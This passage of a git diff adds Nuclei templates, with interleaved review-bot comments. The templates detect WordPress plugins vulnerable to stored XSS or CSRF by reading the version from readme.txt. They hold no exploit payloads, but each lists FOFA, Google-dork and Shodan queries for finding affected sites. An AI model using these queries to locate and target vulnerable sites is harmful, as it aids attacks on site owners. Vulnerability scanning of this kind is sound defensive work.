+ tags: cve,wordpress,wp-plugin,multilevel-referral-plugin-for-woocommerce,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/multilevel-referral-plugin-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "multilevel-referral-plugin-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.27')
\ No newline at end of file
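Review bot: `redirects: true` in the `http` block follows redirects to any host, so a target that redirects the readme path elsewhere can have another site's readme.txt evaluated and reported against the scanned host. Restricting the request to same-host redirects avoids that misattribution: replace `redirects: true` with `host-redirects: true` and keep `max-redirects: 3`, assuming the nuclei version in use supports that field. Every template added in this commit carries the same two redirect lines.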
diff --git a/poc/cve/CVE-2024-53743-c41dcd0f5b2eeb66644a41c3df7085c6.yaml b/poc/cve/CVE-2024-53743-c41dcd0f5b2eeb66644a41c3df7085c6.yaml
new file mode 100644
index 0000000000..587c415395
--- /dev/null
+++ b/poc/cve/CVE-2024-53743-c41dcd0f5b2eeb66644a41c3df7085c6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53743-c41dcd0f5b2eeb66644a41c3df7085c6
+
+info:
+ name: >
+ Countdown Timer for Elementor <= 1.3.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Countdown Timer for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e2d35599-2402-4837-97a3-707cd33d439a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53743
+ metadata:
+ fofa-query: "wp-content/plugins/countdown-timer-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/countdown-timer-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-53743'
+ tags: cve,wordpress,wp-plugin,countdown-timer-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/countdown-timer-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "countdown-timer-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.6')
\ No newline at end of file
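Review bot: `name: >` and `description: >` use the folded style with default (clip) chomping, so both values end in a newline that then travels into whatever consumes the template metadata. Using the strip indicator keeps the strings clean: `name: >-` and `description: >-`. This is a style point and applies equally to the other templates in this commit, which are generated with the same header.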
diff --git a/poc/cve/CVE-2024-53744-19861d99577b3be5146b27b69f05c3f4.yaml b/poc/cve/CVE-2024-53744-19861d99577b3be5146b27b69f05c3f4.yaml
new file mode 100644
index 0000000000..3c5a7a0c72
--- /dev/null
+++ b/poc/cve/CVE-2024-53744-19861d99577b3be5146b27b69f05c3f4.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53744-19861d99577b3be5146b27b69f05c3f4
+
+info:
+ name: >
+ Elementor Image Gallery Plugin <= 1.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Elementor Image Gallery Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/52a094b0-acee-412a-ad15-38c9f4510c48?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53744
+ metadata:
+ fofa-query: "wp-content/plugins/skyboot-portfolio-gallery/"
+ google-query: inurl:"/wp-content/plugins/skyboot-portfolio-gallery/"
+ shodan-query: 'vuln:CVE-2024-53744'
+ tags: cve,wordpress,wp-plugin,skyboot-portfolio-gallery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/skyboot-portfolio-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "skyboot-portfolio-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.3')
\ No newline at end of file
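Review bot: The `word` matcher requires the literal, case-sensitive slug `skyboot-portfolio-gallery` in the readme body, but the plugin's display name here is "Elementor Image Gallery Plugin" and nothing in the readme format guarantees that the directory slug appears in the text. With `matchers-condition: and`, a readme that never mentions the slug makes the template miss an affected version. The request path already pins the slug and the `dsl` matcher already requires a parsed `Stable tag:`, so I would either drop this matcher or check it against the plugin's published readme before relying on it. The same slug-in-body assumption is made in the other templates of this commit, most visibly where slug and name differ (`fd-elementor-button-plus`, `bin-stripe-donation`).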
diff --git a/poc/cve/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml b/poc/cve/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml
new file mode 100644
index 0000000000..a489ebd6fd
--- /dev/null
+++ b/poc/cve/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb
+
+info:
+ name: >
+ 소셜 공유 버튼 By 코스모스팜 <= 1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The 소셜 공유 버튼 By 코스모스팜 plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4540b21-ef63-4cd2-b605-c66a7b76934f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53745
+ metadata:
+ fofa-query: "wp-content/plugins/cosmosfarm-share-buttons/"
+ google-query: inurl:"/wp-content/plugins/cosmosfarm-share-buttons/"
+ shodan-query: 'vuln:CVE-2024-53745'
+ tags: cve,wordpress,wp-plugin,cosmosfarm-share-buttons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cosmosfarm-share-buttons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cosmosfarm-share-buttons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53746-3ded91890966ff471c6e9354d423b5ef.yaml b/poc/cve/CVE-2024-53746-3ded91890966ff471c6e9354d423b5ef.yaml
new file mode 100644
index 0000000000..af31563179
--- /dev/null
+++ b/poc/cve/CVE-2024-53746-3ded91890966ff471c6e9354d423b5ef.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53746-3ded91890966ff471c6e9354d423b5ef
+
+info:
+ name: >
+ Elementor Button Plus <= 1.3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Elementor Button Plus plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4f6c69ca-eb1e-445a-af72-5f03dfa07f9b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53746
+ metadata:
+ fofa-query: "wp-content/plugins/fd-elementor-button-plus/"
+ google-query: inurl:"/wp-content/plugins/fd-elementor-button-plus/"
+ shodan-query: 'vuln:CVE-2024-53746'
+ tags: cve,wordpress,wp-plugin,fd-elementor-button-plus,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/fd-elementor-button-plus/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "fd-elementor-button-plus"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53747-4e94b0bd06bf43aff2239514311d93c8.yaml b/poc/cve/CVE-2024-53747-4e94b0bd06bf43aff2239514311d93c8.yaml
new file mode 100644
index 0000000000..285c4fd7cc
--- /dev/null
+++ b/poc/cve/CVE-2024-53747-4e94b0bd06bf43aff2239514311d93c8.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53747-4e94b0bd06bf43aff2239514311d93c8
+
+info:
+ name: >
+ Video Player for WPBakery <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Video Player for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ee992216-53dd-441e-9c8f-55fbe7567cb7?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53747
+ metadata:
+ fofa-query: "wp-content/plugins/video-player-for-wpbakery/"
+ google-query: inurl:"/wp-content/plugins/video-player-for-wpbakery/"
+ shodan-query: 'vuln:CVE-2024-53747'
+ tags: cve,wordpress,wp-plugin,video-player-for-wpbakery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/video-player-for-wpbakery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "video-player-for-wpbakery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53748-7d8e48f7ecab5232b81666c88e70115b.yaml b/poc/cve/CVE-2024-53748-7d8e48f7ecab5232b81666c88e70115b.yaml
new file mode 100644
index 0000000000..fc91258479
--- /dev/null
+++ b/poc/cve/CVE-2024-53748-7d8e48f7ecab5232b81666c88e70115b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53748-7d8e48f7ecab5232b81666c88e70115b
+
+info:
+ name: >
+ WP Mermaid <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WP Mermaid plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/44a62dd2-539a-4d9a-a32e-f935aa1d0d58?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53748
+ metadata:
+ fofa-query: "wp-content/plugins/wp-mermaid/"
+ google-query: inurl:"/wp-content/plugins/wp-mermaid/"
+ shodan-query: 'vuln:CVE-2024-53748'
+ tags: cve,wordpress,wp-plugin,wp-mermaid,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-mermaid/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-mermaid"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53749-1d9d87f4022b97c2e4089a6828e241fc.yaml b/poc/cve/CVE-2024-53749-1d9d87f4022b97c2e4089a6828e241fc.yaml
new file mode 100644
index 0000000000..b441125385
--- /dev/null
+++ b/poc/cve/CVE-2024-53749-1d9d87f4022b97c2e4089a6828e241fc.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53749-1d9d87f4022b97c2e4089a6828e241fc
+
+info:
+ name: >
+ Post Carousel Slider for Elementor <= 1.4.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Post Carousel Slider for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c205041a-01c9-44cd-8270-dafae2a78cbf?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53749
+ metadata:
+ fofa-query: "wp-content/plugins/post-carousel-slider-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/post-carousel-slider-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-53749'
+ tags: cve,wordpress,wp-plugin,post-carousel-slider-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/post-carousel-slider-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "post-carousel-slider-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53750-631ac7e2fd3894f3f08f81c51233807e.yaml b/poc/cve/CVE-2024-53750-631ac7e2fd3894f3f08f81c51233807e.yaml
new file mode 100644
index 0000000000..4a7e5a16b1
--- /dev/null
+++ b/poc/cve/CVE-2024-53750-631ac7e2fd3894f3f08f81c51233807e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53750-631ac7e2fd3894f3f08f81c51233807e
+
+info:
+ name: >
+ PayPal Responder <= 1.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The PayPal Responder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c6b43a4f-ef44-46cf-89ce-5747ac5f47cd?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53750
+ metadata:
+ fofa-query: "wp-content/plugins/paypal-responder/"
+ google-query: inurl:"/wp-content/plugins/paypal-responder/"
+ shodan-query: 'vuln:CVE-2024-53750'
+ tags: cve,wordpress,wp-plugin,paypal-responder,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/paypal-responder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "paypal-responder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53751-eec858ad68cecec914c1fdcabd2501d5.yaml b/poc/cve/CVE-2024-53751-eec858ad68cecec914c1fdcabd2501d5.yaml
new file mode 100644
index 0000000000..c6c06c2277
--- /dev/null
+++ b/poc/cve/CVE-2024-53751-eec858ad68cecec914c1fdcabd2501d5.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53751-eec858ad68cecec914c1fdcabd2501d5
+
+info:
+ name: >
+ Build App Online <= 1.0.22 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+ The Build App Online plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.22. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9a68e014-69df-4498-9cc2-618d966e5ed6?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-53751
+ metadata:
+ fofa-query: "wp-content/plugins/build-app-online/"
+ google-query: inurl:"/wp-content/plugins/build-app-online/"
+ shodan-query: 'vuln:CVE-2024-53751'
+ tags: cve,wordpress,wp-plugin,build-app-online,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/build-app-online/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "build-app-online"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.22')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53752-4e8cd08f77b9779e9257358737a94eef.yaml b/poc/cve/CVE-2024-53752-4e8cd08f77b9779e9257358737a94eef.yaml
new file mode 100644
index 0000000000..f4b9130e48
--- /dev/null
+++ b/poc/cve/CVE-2024-53752-4e8cd08f77b9779e9257358737a94eef.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53752-4e8cd08f77b9779e9257358737a94eef
+
+info:
+ name: >
+ Stripe Donation <= 1.2.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Stripe Donation plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.2.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4335e598-d48b-4dbe-b6a4-69790acecfdd?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53752
+ metadata:
+ fofa-query: "wp-content/plugins/bin-stripe-donation/"
+ google-query: inurl:"/wp-content/plugins/bin-stripe-donation/"
+ shodan-query: 'vuln:CVE-2024-53752'
+ tags: cve,wordpress,wp-plugin,bin-stripe-donation,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bin-stripe-donation/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bin-stripe-donation"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53753-358e653d0dd73eb56688321aaef32145.yaml b/poc/cve/CVE-2024-53753-358e653d0dd73eb56688321aaef32145.yaml
new file mode 100644
index 0000000000..ac7d701567
--- /dev/null
+++ b/poc/cve/CVE-2024-53753-358e653d0dd73eb56688321aaef32145.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53753-358e653d0dd73eb56688321aaef32145
+
+info:
+ name: >
+ CultBooking Hotel Booking Engine <= 2.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The CultBooking Hotel Booking Engine plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/79844b53-5527-42e2-8363-db0eb73d1f6c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53753
+ metadata:
+ fofa-query: "wp-content/plugins/cultbooking-booking-engine/"
+ google-query: inurl:"/wp-content/plugins/cultbooking-booking-engine/"
+ shodan-query: 'vuln:CVE-2024-53753'
+ tags: cve,wordpress,wp-plugin,cultbooking-booking-engine,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cultbooking-booking-engine/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cultbooking-booking-engine"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53754-493566f1c1a1308e200b9e93498256c2.yaml b/poc/cve/CVE-2024-53754-493566f1c1a1308e200b9e93498256c2.yaml
new file mode 100644
index 0000000000..77991f2135
--- /dev/null
+++ b/poc/cve/CVE-2024-53754-493566f1c1a1308e200b9e93498256c2.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53754-493566f1c1a1308e200b9e93498256c2
+
+info:
+ name: >
+ Out Of Stock Badge <= 1.3.1 - Cross-Site Request Forgery to Stored Cross-site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Out Of Stock Badge plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b80802cd-6fcc-4cdb-b6d7-a9171cadcc83?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53754
+ metadata:
+ fofa-query: "wp-content/plugins/out-of-stock-badge/"
+ google-query: inurl:"/wp-content/plugins/out-of-stock-badge/"
+ shodan-query: 'vuln:CVE-2024-53754'
+ tags: cve,wordpress,wp-plugin,out-of-stock-badge,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/out-of-stock-badge/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "out-of-stock-badge"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53755-504d4dcc3efe862c171e1626b904f4e4.yaml b/poc/cve/CVE-2024-53755-504d4dcc3efe862c171e1626b904f4e4.yaml
new file mode 100644
index 0000000000..534b8119c2
--- /dev/null
+++ b/poc/cve/CVE-2024-53755-504d4dcc3efe862c171e1626b904f4e4.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53755-504d4dcc3efe862c171e1626b904f4e4
+
+info:
+ name: >
+ Third Party Cookie Eraser <= 1.0.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Third Party Cookie Eraser plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ded8f958-ed2a-43ab-8688-9f6d16515469?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53755
+ metadata:
+ fofa-query: "wp-content/plugins/third-party-cookie-eraser/"
+ google-query: inurl:"/wp-content/plugins/third-party-cookie-eraser/"
+ shodan-query: 'vuln:CVE-2024-53755'
+ tags: cve,wordpress,wp-plugin,third-party-cookie-eraser,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/third-party-cookie-eraser/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
